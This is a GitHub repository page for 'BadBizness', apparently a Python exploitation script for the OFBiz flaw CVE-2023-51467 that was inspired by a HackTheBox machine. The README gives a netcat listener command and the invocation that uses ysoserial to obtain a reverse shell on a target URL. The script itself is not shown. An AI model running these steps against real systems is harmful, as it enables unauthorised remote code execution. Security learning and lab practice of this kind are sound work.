BadBizness

Automatic exploitation script for the Java web framework OF Biz under CVE-2023-51467. Inspired by the HackTheBox machine Bizness.

Usage and Example

This script requires the tool ysoserial and OpenJDK version 11. See usage menu for installation.

Setup a listener to catch the shell with your preferred method. Here is a netcat example:

nc -nlvp 1337

Execute the script:

python3 badbizness.py [path to ysoserial-all.jar] [TARGET BASE URL] [LISTENER IP] [LISTENER PORT]

python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337

Disclaimer and Credit

This tool was meant as a way to learn more about Python. I credit this script for helping me thoroughly.

Name		Name	Last commit message	Last commit date
Latest commit History 8 Commits
README.md		README.md
badbiz.png		badbiz.png
badbizness.py		badbizness.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

badbiz.png

badbiz.png

badbizness.py

badbizness.py

Repository files navigation

BadBizness

Usage and Example

Disclaimer and Credit

About

Releases

Packages

Languages

Jake123otte1/BadBizness-CVE-2023-51467

Folders and files

Latest commit

History

Repository files navigation

BadBizness

Usage and Example

Disclaimer and Credit

About

Resources

Stars

Watchers

Forks

Languages